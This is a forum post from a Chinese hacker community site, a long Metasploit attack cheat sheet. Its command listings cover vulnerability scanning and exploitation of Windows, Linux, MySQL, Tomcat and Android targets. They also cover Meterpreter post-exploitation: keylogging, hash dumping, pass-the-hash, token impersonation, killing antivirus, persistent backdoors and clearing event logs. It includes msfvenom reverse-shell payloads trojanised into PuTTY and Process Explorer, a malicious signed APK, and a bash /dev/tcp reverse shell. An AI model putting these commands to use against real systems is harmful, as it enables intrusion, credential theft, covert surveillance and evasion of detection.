中国红客联盟国际站联盟介绍联盟架构联盟文化联盟事记联盟邮箱购买特权捐助我们收藏本站
请登录
立即注册
首页Portal
资讯
圈子Group
贡献榜
关于我们
红客起源事记
搜索
当前位置:»交流社区 中国红客联盟【技术分享区】 攻击技术探索 漏洞利用技术

[漏洞利用] 漏洞利用技术

115 0
Honkers 10 小时前 | 显示全部楼层 |阅读模式

漏洞利用技术

  1. Metasploit框架的强大之处就是提供了大量的渗透测试模块和插件。模块按照不同用途可以分为7种类型,分别是Exploits(渗透攻击模块)、Auxiliary(辅助模块)、Post(后渗透攻击模块)、Payloads(攻击载荷模块)、Encoders(编码器模块)、Nops(空指令模块)和Evasion(规避模块)。

  2. Nessus号称是世界上最流行的漏洞扫描程序,工具提供完整的电脑漏洞扫描服务,并随时更新其漏洞数据库。实施的漏洞扫描包括:网络设备、虚拟主机、操作系统、数据库、Web应用程序、危害检测等。

    1. load nessus # Metasploit载入Nessus桥插件
    2. nessus_help # 查看Nessus桥插件支持的所有命令
    3. nessus_connect username:password@address:8834 # 登录到Nessus服务器
    4. nessus_policy_list # 查看服务器上所有已经定义的扫描策略
    5. nessus_scan_new # 命令创建扫描任务
    6. nessus_scan_launch <scan ID> # 启动扫描任务
    7. nessus_scan_list # 查看扫描运行的状态
    8. nessus_report_hosts <scan ID> # 查看其扫描报告
    9. nessus_report_host_details <scan ID> <host ID> # 查看其中某台主机的漏洞信息
    10. nessus_report_vulns <scan ID> # 查看具体的漏洞信息
    11. vulns --rhosts 192.168.1.104 # 查看具体的漏洞信息
    复制代码

  3. OpenVAS(开放式漏洞评估系统)是一个客户端/服务器架构,它常用来评估目标主机上的漏洞。OpenVAS是Nessus项目的一个分支,它提供的产品是完全免费的apt-get update && apt-get install openvas* -y。

    1. changeme -a <target> # 弱密码探查
    2. openvas-setup # 初始化openvas库
    3. openvasmd --user=admin --new-password=123.com # 初始化密码
    4. openvas-check-setup # 检查安装完整性
    5. netstat -anptul # 检查服务状态
    6. # 设置外部访问
    7. vi /usr/lib/systemd/system/greenbone-security-assistant.service
    8. [Service]
    9. Type=simple
    10. PIDFile=/var/run/gsad.pid
    11. ExecStart=/usr/sbin/gsad --foreground --listen=0.0.0.0 --port=9392 --mlisten=0.0.0.0 --allow-header-host=192.168.19.132 --mport=9390
    12. vi /etc/default/openvas-manager
    13. MANAGER_ADDRESS=0.0.0.0
    14. vi /etc/default/greenbone-security-assistant
    15. GSA_ADDRESS=0.0.0.0
    16. MANAGER_ADDRESS=0.0.0.0
    18. openvas-stop # 停止OpenVAS服务
    19. openvas-start # 启动OpenVAS服务
    20. https://127.0.0.1:9392/ # 登录:amdin:123.com
    22. unix-privesc-check [standard|detailed] # 检查linux错误配置:standard标准模式、detailed详细模式
    23. # 手动查找漏洞信息
    24. http://cve.mitre.org/data/refs/refmap/source-MS.html # CVE的管理网站地址为
    25. https://technet.microsoft.com/en-us/security/bulletins # 微软漏洞官网地址
    27. openvas-setup # 下载并更新库
    28. openvasmd --user=admin --new-password=password # 修改密码
    29. openvas-check-setup # 检查是否安装成功
    30. netstat -ntlp # 查看监听的端口
    31. openvas-start # 启动服务
    32. https://127.0.0.1:9392 # 登录OpenVAS服务
    33. openvas-setup # 重启服务
    34. # Metasploit中远程调用OpenVAS服务
    35. load openvas # 加载Openvas插件
    36. openvas_help # 查看模块支持的所有命令
    37. openvas_connect username password host port <ssl-confirm> # 命令登录到OpenVAS服务器
    38. openvas_target_create <name> <hosts> <comment> # 创建扫描目标
    39. openvas_config_list # 查看下扫描配置列表
    40. openvas_task_create <name> <comment> <config_id> <target_id>
    41. # 创建扫描任务
    42. openvas_task_start <id> # 启动扫描任务
    43. openvas_task_list # 查看扫描任务的进度
    44. openvas_report_list # 查看下扫描报告列表
    45. openvas_format_list # 查看支持的扫描报告格式
    46. openvas_report_download <ID> # 命令下载扫描报告
    复制代码

  4. 为了区分不同扫描任务,Metasploit提供了工作区。每个工作区都保存相关任务的各种信息。不同工作区之间的信息相互独立,避免数据混淆。所以,在进行渗透攻击前,用户需要准备不同的工作区,将扫描结果分开保存。

    1. db_nmap -sP 192.168.59.0/24 # 扫描网络中存在的主机
    2. db_import <filename> # 导入扫描报告
    3. db_export -f <format> [filename] # 工作区所有的数据进行备份
    4. analyze 192.168.59.131 # 对目标主机192.168.59.131进行预分析
    6. # 工作区管理
    7. workspace # 列出工作区
    8. -h # 显示帮助信息
    9. -a work1 # 添加指定名称的工作区
    10. -r work1 work2 # 重命名工作区
    11. -v # 显示工作区详细信
    12. -d work1 # 删除指定名称的工作区
    13. -D # 删除所有工作区
    15. # 管理主机信息
    16. hosts [ options ] [addr1 addr2 ...] # 列出主机信息
    17. -a,--add # 添加主机
    18. -d,--delete # 删除主机
    19. -c<col1,col2> # 列出指定的列
    20. -C<col1,col2> # 与-c选项含义相同,但是使用后,如果不重启数据库,以后使用只列出-C指定的列
    21. -h,--help # 显示帮助信息
    22. -u,--up # 只显示开放的主机
    23. -o<file> # 将结果保存到CSV格式的文件中
    24. -O<column> # 按照指定列排序
    25. -R,--rhosts # 将搜索的结果作为RHOSTS选项的值
    26. -S,--search # 指定字符串进行搜索
    27. -i,--info # 修改主机info信息
    28. -n,--name # 修改name列的信息
    29. -m,--comment # 修改comment列的信息
    30. -t,--tag # 为主机信息添加标签
    32. # 管理模块操作
    33. use <modulepath> # 加载模块
    34. show options # 查看模块
    35. set [option] [value] # 修改选项
    36. setg [option] [value] # 全局选项
    37. unset [option] # 重置选项
    38. save # 保存配置
    39. check # 查有效性
    40. exploit # 实施攻击
    41. edit # 编辑模块
    42. back # 退出模块
    44. use auxiliary/scanner/portscan/tcp # 使用模块
    47. # 管理服务信息
    48. services [options] [addr1 addr2 ...] # 列出服务信息
    49. -a,--add # 添加服务
    50. -d,--delete # 删除服务
    51. -c<col1,col2> # 仅显示指定列的服务
    52. -h,--help # 显示帮助信息
    53. -s<name1,name2> # 指定服务名称进行搜索
    54. -p<port1,port2> # 指定端口号进行搜索
    55. -r<protocol> # 只显示基于TCP/UDP协议的服务
    56. -u,--up # 只显示开启的服务
    57. -o<file> # 将结果保存到CSV格式的文件中
    58. -O<column> # 按照指定列排序
    59. -R,--rhosts # 将搜索的结果作为RHOSTS选项的值
    60. -S,--search # 指定字符串进行搜索
    62. # 管理认证信息
    63. creds [filter options] [address range] # 查看认证信息
    64. add user:admin password:pass realm:workgroup # 添加认证信息,可添加的认证信息字段
    65. user # 用户名
    66. password # 密码
    67. ntlm # NTLM哈希值
    68. ssh-key # SSH-Key文件
    69. hash # 不可重放哈希值
    70. realm # 域
    71. realm-type # 域的类型
    72. -d # 删除全部的认证信息
    73. -P,--password <regex> # 根据密码进行过滤
    74. -p,--port <portspec> # 根据端口过滤
    75. -s <svc names> # 根据服务过滤
    76. -u,--user <regex> # 根据用户过滤
    77. -t,--type <type> # 根据类型进行过滤
    78. -O,--origins < origins > # 根据起源过滤
    79. -o <file.csv> # 认证信息保存到文件中
    80. -R # 为模块的RHOSTS进行赋值
    82. # 管理战利品
    83. loot <options> # 查看战利品
    84. -a,--add # 添加地址列
    85. -d,--delete # 删除所有列
    86. -f,--file # 从文件中导入
    87. -i,--info # 添加的info列的内容
    88. -t<type1,type2> # 指定列的类型搜索
    89. -S,--search # 指定搜索使用的关键词
    90. -h,--help # 显示帮助信息
    92. # 管理备注信息
    93. notes [options] [addr range] # 查看备注信息
    94. -a,--add # 添加新的备注信息
    95. -d,--delete # 删除备注信息
    96. -n,--note<data> # 为设置备注内容。其中,data表示数据
    97. -t<type1,type2> # 搜索指定类型列的备注信息
    98. -h,--help # 显示帮助信息
    99. -R,--rhosts # 将搜索的结果作为RHOSTS选项的值
    100. -S,--search # 指定字符串进行搜索
    101. -o,--output # 将结果保存到CSV格式的文件中
    102. --sort<field1,field2> # 字段排序
    104. # 管理漏洞信息
    105. vulns [options] [addr range] # 查看漏洞信息
    106. -o<file> # 将输出信息保存到CSV格式文件中
    107. -p,--port<portspec> # 显示指定端口的漏洞信息
    108. -s<svc names> # 显示指定服务名称的漏洞信息
    109. -R,--rhosts # 将搜索到的结果主机设置为RHOSTS的选项值
    110. -S,--search # 指定字符串进行过滤
    111. -i,--info # 显示info列的信息
    112. -h,--help # 显示帮助信息
    113. db_rebuild_cache # 重建数据缓存
    114. msfconsole # 启动终端
    115. show all # 查看模块的详细信息
    117. # 搜索特定模块
    118. search [word]
    119. app # 指定client和server攻击的模块
    120. author # 通过模块作者名称进行查找
    121. bid # 根据Bugtraq ID来查询模块
    122. cve # 根据CVE ID来查询模块
    123. edb # 根据Exploit-DB ID来查询模块
    124. name # 根据名称来查询模块
    125. osvdb # 根据OSVDB ID来查询模块
    126. platform # 根据模块级别来查询,缩小查询范围
    127. ref # 根据ref来查询模块
    128. type # 根据类型来查询模块。如类型为exploit、auxiliary或post
    130. # 过滤结果
    131. grep http search oracle
    132. -A<opt> # 显示一个匹配输出后的行
    133. -B<opt> # 显示一个匹配输出前的行
    134. -c # 仅显示一组匹配行
    135. -h # 显示帮助信息
    136. -i # 忽略实例
    137. -k<opt> # 保留输出开始的行
    138. -m<opt> # 匹配一个结果后停止
    139. -s<opt> # 跳过尝试匹配前的输出结果
    140. -v # 反向匹配
    142. # 渗透攻击类模块(exploit)
    143. use exploit/multi/ssh/sshexec # multi/ssh/sshexec是一个渗透攻击类模块
    144. info # 查看该模块的详细信息
    145. set RHOSTS 192.168.1.106 # 设置目标主机
    146. set PASSWORD msfadmin # 设置密码
    147. set USERNAME msfadmin # 设置用户名
    148. unset # 重新设置
    149. setg # 全局变量设置
    150. save # 命令保存
    151. exploit # 实施攻击
    153. # 辅助模块(auxiliar)
    154. use auxiliary/scanner/mysql/mysql_login # 选择mysql_login辅助模块,mysql登录爆破
    155. set RHOSTS 192.168.1.102
    156. set THREADS 10
    157. set user_file /root/usernames.txt
    158. set pass_file /root/passwords.txt
    159. run
    161. # 攻击载荷(Payload)
    162. run post/linux/gather/enum_system # 使用enum_system后渗透模块获取目标主机的系统信息
    163. use exploit/multi/ssh/sshexec # 通过linux/x86/shell/bind_tcp攻击载荷来获得与目标主机的Shell交互
    164. set payload linux/x86/shell/bind_tcp # 加载攻击载荷
    165. set RHOSTS 192.168.1.105
    166. set PASSWORD 123456
    167. exploit
    169. # IDS/IPS会检查数据包是否合规则,在攻击载荷生成时用到nops文件夹下的NOPs修改(nops)
    170. # 编码模块(Encoders)
    171. ./msfvenom -p windows/meterpreter/bind_tcp RHOST=192.168.1.104 --platform windows -a x86 -e x86/shikata_ga_nai -f exe > msf.exe
    172. # 使用x86/shikata_ga_nai编码创建攻击载荷
    173. # 插件(Plugins)
    174. load # 查看加载插件的方法
    175. load sqlmap # 加载SQLmap插件
    176. help sqlmap # 查看该插件支持的所有命令
    177. sqlmapapi -s -p 8775 # 需要启动sqlmapapi
    178. sqlmap_connect 127.0.0.1 # 连接到sqlmapapi
    179. sqlmap_new_task # 创建一个新的任务
    180. sqlmap_start_task 1 'www.baidu.com' # 启动新建的任务
    181. sqlmap_list_tasks # 查看任务列表
    182. sqlmap_get_status 1 # 查看扫描状态
    183. sqlmap_get_data 1 # 获取扫描的漏洞信息
    184. sqlmap_get_log 1 # 查看扫描任务运行的日志信息
    186. # 规避模块(Evasion),使用windows_defender_exe规避模块,生成一个Windows EXE文件来规避Windows Defender程序
    187. use windows/windows_defender_exe
    188. show options
    189. run # 生成一个规避文件
    191. # 模块扩展,导入第三方模块,渗透测试代码库网站(http://www.exploit-db.com/)
    192. cd /root/.msf4/modules
    193. mkdir -p exploits/window/logs/
    194. mv /root/.msf4/modules/module.rb ./module.rb
    196. # 动态加载模块,临时使用和临时关闭
    198. loadpath [modulespath] # 用来从一个路径中搜索并加载第三方模块
    199. load [var=val var=val ...] # 加载模块
    200. unload [module] # 卸载模块
    203. jobs [option] # 查看任务
    204. -K # 列出终端运行的所有任务
    205. -h # 显示帮助信息
    206. -i<opt> # 列出一个任务的详细信息
    207. -k<opt> # 指定终端的任务名称
    208. -l # 列出所有运行任务
    209. -v # 显示更详细信息
    210. kill <ID> # 结束任务
    复制代码

  5. 扩展功能,为了加强Metasploit的漏洞利用功能,Metasploit还提供了一些扩展模块和其他功能,如Meterpreter、Msfvenom和免杀功能。

    1. # Meterpreter是Metasploit框架的一个扩展模块,这些功能包括反追踪、纯内存工作模式、密码哈希值获取、权限提示、跳板攻击等。
    2. # 捕获控制设备信息
    3. # 捕获屏幕
    4. screenshot # 捕获目标主机当前正在显示的屏幕
    5. run sound_recorder # 录制目标主机中麦克风的声音,默认录制30秒的声音
    6. # 获取键盘记录
    7. run post/windows/capture/keylog_recorder # keylog_recorder模块来获取键盘记录信息
    8. keyscan_start # 启动键盘输入
    9. keyscan_dump # 捕获键盘输入
    10. keyscan_stop # 停止捕获
    12. # 提升权限
    13. getuid # 查看获取到的权限等级
    14. shell # 进入PowerShell
    15. exit # 退出PowerShell终端
    16. getsystem # 提升权限
    18. # 挖掘用户名和密码
    19. run post/windows/gather/hashdump # 获取系统所有的用户名和密码哈希值
    20. use exploit/windows/smb/psexec # 使用psexec模块实现哈希值传递
    21. set payload windows/meterpreter/reverse_tcp # 选择攻击载荷
    22. set LHOST 192.168.1.105 # 设置攻击主机地址
    23. set LPORT 443 # 设置端口号
    24. set RHOSTS 192.168.1.104 # 设置目标主机地址
    25. set SMBUser Administrator # 指定用户名
    26. set SMBPass 44efce164ab921caaad3b435b51404ee:32ed87bdb5fdc5e9cba88547376818d4
    27. # 指定用户的密码哈希值
    28. exploit
    30. # 破解纯文本密码
    31. load mimikatz # 加载mimikatz模块
    32. help # 查看mimikatz模块下有效的命令
    33. msv # 使用msv命令恢复哈希密码
    34. kerberos # 获取Kerberos(网络认证协议)信息
    36. # 假冒令牌
    37. ps # 使用ps命令列出当前运行的应用程序及运行这些应用的用户账号
    38. steal_token <PID> # 盗取管理员用户的令牌
    39. use incognito # 加载incognito模块
    40. list_tokens -u # 列举所有的令牌
    41. impersonate_token BENET \\domainadmin # 假冒域管理员身份
    42. add_user abc password -h 192.168.1.104 # 此时用户可以以管理员身份进行一些操作
    44. # 恢复目标主机删除的文件
    45. background # 后台运行Meterprete会话
    46. use post/windows/gather/forensics/ # 使用recovery_files模块
    47. recovery_files
    48. show options
    49. set DRIVE E:
    50. set SESSION 1
    51. run # 启动渗透攻击
    52. set FILES txt # 选择恢复后缀名为.txt的文件
    53. run
    55. # 通过跳板攻击其他机器,这里可以使用在scripts/meterpreter/目录中的Meterpreter外部脚本来实现
    56. # 成功获取到了Meterpreter会话
    57. run get_local_subnets # 查看目标系统上的子网
    58. route add [IP] [make] [ID] # 将攻击会话放到后台运行,并且添加路由条目
    59. background # 将会话放到后台,其会话ID为1
    60. route add 192.168.1.0 255.255.255.0 1 # 添加路由条目
    61. route print # 查看添加的路由条目
    62. load auto_add_route # 自动添加路由
    64. # 使用Meterpreter脚本
    65. run [scriptname]
    66. run post/windows/manage/migrate
    67. migrate [PID] # 迁移进程
    68. 2.关闭杀毒软件
    69. run killav # killav扩展脚本来停止相关进程
    70. run hashdump # 获取系统密码哈希值
    71. run packetrecorder -i 1 # 查看目标机上的所有流量
    72. run scraper # 获取系统信息
    73. sessions -i 1 # 激活Meterpreter会话
    74. run persistence -X -i 50 -p 443 -r 192.168.1.104 # 创建持久后门
    75. background
    76. # 使用multi/handler模块进行监听,等待目标主机反向连接到攻击主机
    77. use multi/handler
    78. set payload windows/meterpreter/reverse_tcp
    79. set LHOST 192.168.1.105
    80. set LPORT 443
    81. exploit
    83. # 将命令行Shell升级为Meterpreter
    84. use exploit/multi/samba/usermap_script
    85. show options
    86. set RHOST 192.168.1.106
    87. exploit -z
    88. sessions -u 1 # 将命令行Shell会话1升级为Meterpreter
    89. sessions
    90. sessions -i 2
    91. sessions -i 1
    92. irb # 清除踪迹
    93. log = client.sys.eventlog.open('system') # 设置想要删除的日志
    94. log=client.sys.eventlog.open('system')
    95. log=client.sys.eventlog.open('security')
    96. log=client.sys.eventlog.open('application')
    97. log=client.sys.eventlog.open('directory service')
    98. log=client.sys.eventlog.open('dns server')
    99. log=client.sys.eventlog.open('file replication service')
    100. log.clear # 清除日志
    101. clearev # 清除日志
    102. msfvenom [option] # MSF攻击载荷生成器
    103. -p|--payload<payloadname> # 指定使用的payload攻击载荷
    104. --payload-options # 列出Payload的标准选项
    105. -l|--list<type> # 列出一个模块类型。可指定的模块类型包括payloads、encoders、nops和all
    106. -n|--nopsled<len> # 指定生成的攻击载荷长度
    107. -f|--format<format> # 指定生成的攻击载荷格式
    108. -e|--encoder<encoder> # 使用的编码方式
    109. -a|--arch<arch> # 使用的架构
    110. --platform<platform> # 使用的平台
    111. -s|--space<len> # 生成攻击载荷的最大尺寸
    112. -b|--bad-chars<strlist> # 指定需要规避的字符列表,如'\x00\xff'
    113. -i|--iterations<count> # 指定进行编码的次数
    114. -c|--add-code<path> # 指定一个额外的win32 shellcode文件
    115. -x|--template<path> # 指定一个自定义的可执行文件作为模板使用
    116. -k|--keep # 配置攻击载荷在一个独立的线程中启动
    117. -o|--out # 保存攻击载荷
    118. -v|--var-name<name> # 指定用于某些输出格式的自定义变量名称
    119. --smallest # 尽可能生成最小的攻击载荷
    120. # 生成一个用于攻击Windows 7 sp1的Meterpreter攻击载荷,并利用shikata_ga_nai编码方式
    121. msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 5 -b '\x00' LHOST=192.168.1.105 LPORT=443 -f exe > payload.exe
    122. upload backdoor.exe
    123. use exploit/multi/handler # 选择用于反向连接的监听模块
    124. set payload windows/meterpreter/reverse_tcp
    125. show options
    126. set LHOST 192.168.1.105
    127. set LPORT 443
    128. exploit
    129. sysinfo
    131. # 免杀技术
    132. msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 5 -b '\x00' LHOST=192.168.1.108 LPORT=443 -f raw | msfvenom -a x86 --platform win -e x86/alpha_upper -i 2 -f raw | msfvenom -a x86 --platform platform win -e x86/shikata_ga_nai -i 5 -f raw | msfvenom -a x86 --platform win -e x86/countdown -i 5 -f exe -o /root/payload.exe
    133. # 多重编码
    134. wget https://live.sysinternals.com/Files/ProcessExplorer.zip
    135. mkdir work
    136. unzip ProcessExplorer.zip -d work/
    137. msfvenom -p windows/meterpreter/reverse_tcp -x work/procexp.exe -e x86/shikata_ga_nai -i 5 -b '\x00' LHOST=192.168.1.108 LPORT=443 -o /root/backdoor.exe # 自定义可执行文件模板
    138. wget http://the.earth.li/~sgtatham/putty/latest/x86/putty.exe
    139. msfvenom -p windows/meterpreter/reverse_tcp -x /root/putty.exe -e x86/shikata_ga_nai -i 5 -b '\x00' LHOST=192.168.1.108 LPORT=443 -k -o /root/putty_backdoor.exe # 隐秘启动一个攻击载荷
    140. upx -5 payload.exe -q # 加壳软件
    复制代码

  6. 漏洞利用

    1. #Windows系统
    3. ## Microsoft Windows远程溢出漏洞——CVE-2012-0002
    4. search CVE-2012-0002
    5. use auxiliary/dos/windows/rdp/ms12_020_maxchannelids
    6. show options
    7. set RHOSTS 192.168.1.106
    8. exploit
    10. ## MS11-003(CVE-2001-0036)漏洞
    11. search MS11-003
    12. use exploit/windows/browser/ms11_003_ie_css_import
    13. show options
    14. set SRVHOST 192.168.1.105
    15. exploit
    16. sessions
    17. sessions -i 1
    18. sysinfo
    20. ## MS03-026(CVE-2003-0352)漏洞
    21. search CVE-2003-0352
    22. use exploit/windows/dcerpc/ms03_026_dcom
    23. show options
    24. set RHOSTS 192.168.1.103
    25. exploit
    27. ## IE浏览器的激光漏洞利用
    28. use exploit/windows/browser/ms10_002_aurora
    29. set payload windows/meterpreter/reverse_tcp
    30. show options
    31. set SRVPORT 80
    32. set URIPATH /
    33. set LHOST 192.168.1.108
    34. set LPORT 443
    35. exploit
    36. run migrate -f
    38. ## 浏览器自动攻击模块
    39. search autopwn
    40. use auxiliary/server/browser_autopwn
    41. set payload windows/meterpreter/reverse_tcp
    42. show options
    43. set LHOST 192.168.1.108
    44. set URIPATH /
    45. exploit
    46. sessions
    47. sessions -i 1
    49. ## 利用AdobeReader漏洞——CVE-2010-1240
    50. use exploit/windows/fileformat/adobe_pdf_embedded_exe
    51. show options
    52. exploit
    54. ## 扫描配置不当的Microsoft SQL Server
    55. search mssql_ping
    56. use auxiliary/scanner/mssql/mssql_ping
    57. show options
    58. set RHOSTS 192.168.1.103
    59. set THREADS 255
    60. run
    63. # Linux系统
    65. ## 利用Samba服务usermap_script漏洞
    66. search usermap_script
    67. use exploit/multi/samba/usermap_script
    68. show options
    69. set RHOSTS 192.168.1.102
    70. exploit
    71. sessions
    73. ## IRC后台守护程序漏洞
    74. search irc
    75. use exploit/unix/irc/unreal_ircd_3281_backdoor
    76. show options
    77. set RHOSTS 192.168.1.107
    78. exploit
    80. ## Samba匿名共享目录可写入漏洞
    81. use auxiliary/admin/smb/samba_symlink_traversal
    82. show options
    83. smbclient -L //192.168.1.102
    84. set RHOSTS 192.168.1.102
    85. set SMBSHARE tmp
    86. exploit
    87. smbclient //192.168.1.102/tmp
    89. ## 是否允许匿名用户登录
    90. use auxiliary/scanner/ftp/anonymous
    91. show options
    92. set RHOSTS 192.168.1.101
    93. run
    95. ## 获取目标主机的root权限
    96. search vsftpd
    97. use exploit/unix/ftp/vsftpd_234_backdoor
    98. show options
    99. set RHOSTS 192.168.1.101
    100. exploit
    103. ## 渗透攻击MySQL数据库
    105. # 判断数据库是否允许外链
    106. use auxiliary/scanner/mysql/mysql_version
    107. set RHOSTS 192.168.1.105
    108. exploit
    111. # 实施暴力破解密码
    112. use auxiliary/scanner/mysql/mysql_login
    113. set RHOSTS 192.168.1.105
    114. set PASS_FILE /root/passwords.txt
    115. set USERNAME root
    116. exploit
    118. # 枚举数据库信息
    119. use auxiliary/admin/mysql/mysql_enum
    120. set RHOSTS 192.168.1.105
    121. set USERNAME root
    122. set PASSWORD 123456
    123. exploit
    125. # 导出Hash值并破解
    126. use auxiliary/scanner/mysql/mysql_hashdump
    127. show options
    128. set RHOSTS 192.168.1.105
    129. set USERNAME root
    130. set PASSWORD 123456
    131. exploit
    132. loot
    133. use auxiliary/analyze/jtr_mysql_fast
    134. exploit
    136. # MySQL认证漏洞利用(CVE-2012-2122)
    137. use auxiliary/scanner/mysql/mysql_authbypass_hashdump
    138. show options
    139. set RHOSTS 192.168.1.105
    140. exploit
    142. # 利用MOF提权
    143. use exploit/windows/mysql/mysql_mof
    144. show options
    145. set RHOSTS 192.168.1.109
    146. set USERNAME root
    147. set PASSWORD 123456
    148. exploit
    150. # Android系统
    152. msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168. 1.108 LPORT=4444 R > /root/android.apk
    154. apt-get install zipalign
    155. keytool [option]
    156. -genkey # 在用户主目录中创建一个默认文件.keystore,还会产生一个mykey的别名。mykey中包含用户的公钥、私钥和证书。
    157. -alias # 产生别名。
    158. -keystore # 指定秘钥库的名称(产生的各类信息将不在.keystore文件中)。
    159. -keyalg # 指定密钥的算法,如RSA、DSA。如果不指定的话,默认使用DSA。
    160. -validity # 指定创建的证书有效期天数,默认为90天。
    161. -keysize # 指定秘钥长度。
    162. -storepass # 指定秘钥库的密码(获取keystore信息所需的密码)。
    163. keypass # 指定别名条目的密码(私钥的密码)。
    164. -dname # 指定证书拥有者信息。例如:"CN=名字与姓氏,OU=组织单位名称,O=组织名称,L=城市或区域名称,ST=州或省份名称,C=单位的两字母国家代码"。
    165. -list # 显示密钥库中的证书信息。
    166. -export # 将指定的证书导出到文件中。
    167. -file # 指定导出到文件的文件名。
    168. -delete # 删除密钥库中的某个条目。
    169. -printcert # 查看导出的证书信息。
    170. -keypasswd # 修改密钥库中指定的条目口令。
    171. -storepasswd # 修改keystore口令。
    172. -import # 将已签名的数字证书导入密钥库。
    174. keytool -genkey -v -keystore /root/key.keystore -alias android -keyalg RSA -keysize 2048 -validity 365 -storepass 123456 -dname "CN= Android,OU=Google,O=Google,L=IL,ST=NY,C=US"
    176. jarsigner [option] jarfilename # 使用JARsigner工具签名APK
    177. -verbose # 签名/验证时输出详细信息
    178. -sigalg # 签名算法的名称
    179. -digestalg # 摘要算法的名称
    180. -keystore # 秘钥库位置
    181. jarsigner -verbose -sigalg SHA1withRSA -digestalg SHA1 -keystore /root/key.keystore /root/android.apk android
    182. jarsigner -verify -verbose -certs /root/android.apk
    184. zipalign -v 4 [APKfile] [new APKfile] # 使用zipalign验证该APK文件
    185. zipalign -v 4 /root/android.apk /root/pentest.apk
    187. # 攻击载荷文件APK已经准备完成。接下来将该APK文件发送到目标Android系统,然后启动Metasploit监听器,等待与目标主机的连接。具体方法如下:
    188. use exploit/multi/handler
    189. set payload android/meterpreter/reverse_tcp
    190. show options
    191. set LHOST 192.168.1.108 # 设置监听主机地址
    192. exploit # 启动监听
    193. sysinfo # 查看目标系统信息
    195. # 网站
    197. # 渗透攻击Tomcat服务
    198. # 利用tomcat_mgr_login模块,暴力破解目标主机(Metasploitable 2)下Tomcat服务的用户名和密码
    199. use auxiliary/scanner/http/tomcat_mgr_login
    200. show options
    201. set RHOSTS 192.168.1.107
    202. set RPORT 8180
    203. exploit
    205. # 利用tomcat_mgr_deploy模块做进一步渗透
    206. search tomcat_mgr_deploy
    207. use exploit/multi/http/tomcat_mgr_deploy
    208. show options
    209. set RHOSTS 192.168.1.107
    210. set USERNAME tomcat
    211. set PASSWORD tomcat
    212. set RPORT 8180
    213. exploit
    216. # CVE-2010-0425漏洞
    217. search CVE-2010-0425
    218. use auxiliary/dos/http/apache_mod_isapi
    219. show options
    220. set RHOSTS 192.168.1.102
    221. exploit
    223. # 探测网站是否启用WebDAV
    224. use auxiliary/scanner/http/webdav_scanner
    225. show options
    226. set RHOSTS 192.168.1.0/24
    227. exploit
    229. # Oracle Java SE远程拒绝服务漏洞(CVE-2012-0507)
    230. search CVE-2012-0507
    231. use exploit/multi/browser/java_atomicreferencearray
    232. show options
    233. exploit
    236. # Java零日漏洞(CVE-2012-4681)
    237. use exploit/multi/browser/java_jre17_exec
    238. show options
    239. show targets
    240. set target 1
    241. set payload windows/meterpreter/reverse_tcp
    242. set LHOST 192.168.1.108
    243. set SRVHOST 192.168.1.108
    244. exploit
    247. # 端口扫描
    248. search portscan
    249. use auxiliary/scanner/portscan/syn
    250. show options
    251. set RHOSTS 192.168.1.105
    252. set THREADS 50
    253. run
    255. # 服务版本扫描
    256. search ftp_version
    257. use auxiliary/scanner/ftp/ftp_version
    258. show options
    259. set RHOSTS 192.168.1.101
    260. run
    262. # 扫描服务弱口令
    263. search postgresql
    264. use auxiliary/scanner/postgres/postgres_login
    265. show options
    266. set RHOSTS 192.168.1.101
    267. exploit
    复制代码

  7. 辅助功能

    1. connect [option] # 连接主机
    2. -C # 对于EOL序列尝试使用CRLF
    3. -p<opt> # 指定源端口
    4. -s<opt> # 指定源地址
    5. -c<opt> # 指定使用的Comm端口
    6. -h # 显示帮助信息
    7. -i<opt> # 发送一个文件的内容
    8. -p<opt> # 列出使用的代理
    9. -s # 使用SSL连接
    10. -u # 切换到一个UDP套接字
    11. -w<opt> # 指定连接超时值
    12. -z # 仅尝试连接
    14. resource path1 [path2...] # 批处理
    15. resource version.rc # 将version命令保存到version.rc文件中。然后可以通过resource命令来加载该文件
    17. # 在资源文件中设置攻击目标和攻击载荷等参数
    18. vim autoexploit.rc
    19. use exploit/windows/smb/ms08_067_netapi
    20. set RHOST 192.168.1.109
    21. set PAYLOAD windows/meterpreter/reverse_tcp
    22. set LHOST 192.168.1.105
    23. exploit
    24. resource /root/autoexploit.rc
    25. ./msfconsole -r /root/autoexploit.rcbash -c 'bash -i >&/dev/tcp/127.0.0.1/4444 2>&1 0>&1'
    28. sessions [id] # 会话管理
    29. -C<opt> # 运行一个Meterpreter命令
    30. -K # 保持所有终端会话
    31. -c<opt> # 运行一个命令
    32. -h # 显示帮助信息
    33. -i<opt> # 进入指定会话ID的交互模式
    34. -k<opt> # 结束指定会话的ID
    35. -l # 列出所有活跃会话
    36. -q # 安静模式
    37. -r # 重置会话的缓冲
    38. -s<opt> # 运行一个脚本
    39. -t<opt> # 设置一个响应超时值,默认是15
    40. -u<opt> # 升级一个Shell到Meterpreter会话
    41. -v # 列出会话详细信息
    42. -x # 显示扩展信息
    44. route[add/remove] subnet netmask [comm/sid] # 使用路由
    45. route [add/remove] cidr [comm/sid]
    46. route [get]
    47. route [flush]
    48. route[print]
    49. add # 添加一个路由
    50. remove # 删除一个路由。del是一个别名
    51. flush # 删除所有路由
    52. get # 显示指定目标的路由
    53. print # 显示所有活动路由
    55. # Nessus是一款知名的漏洞扫描工具。Metasploit提供了Nessus插件,可以直接调用Nessus,方便两个工具的衔接。用户在Metasploit中加载该插件后,则可以使用该插件提供的命令来连接Nessus服务器,并以远程方式来实施漏洞扫描。本附录将详细介绍Nessus插件的使用。
    57. # 使用Nessus服务器
    58. nessus_connect username:password@serveraddress:8834 # 连接服务器
    60. # 快速连接
    61. nessus_save # 保存当前的登录认证信息
    62. nessus_connect # 快速连接到Nessus服务器
    63. nessus_logout # 退出登录
    65. # 查看服务器状态
    66. nessus_server_properties # 显示Nessus服务器信息
    67. nessus_server_status # 检查服务器状态
    68. nessus_admin # 检查用户是否为管理员
    69. nessus_folder_list # 列出服务器所有配置目录
    70. nessus_scanner_list # 列出所有扫描器
    71. # 使用策略模版
    72. nessus_template_list scan # 列出扫描模板
    73. nessus_template_list policy # 列出所有策略模板
    74. nessus_policy_list -S searchterm # 查看用户创建的所有策略模板
    75. nessus_policy_del <policy ID> # 删除策略模版
    76. nessus_policy_list
    78. # 管理扫描任务
    79. nessus_scan_list -S searchterm # 列出所有扫描任务
    80. scan_details <scan ID> <category> -S searchterm # 查看指定任务的详细信息
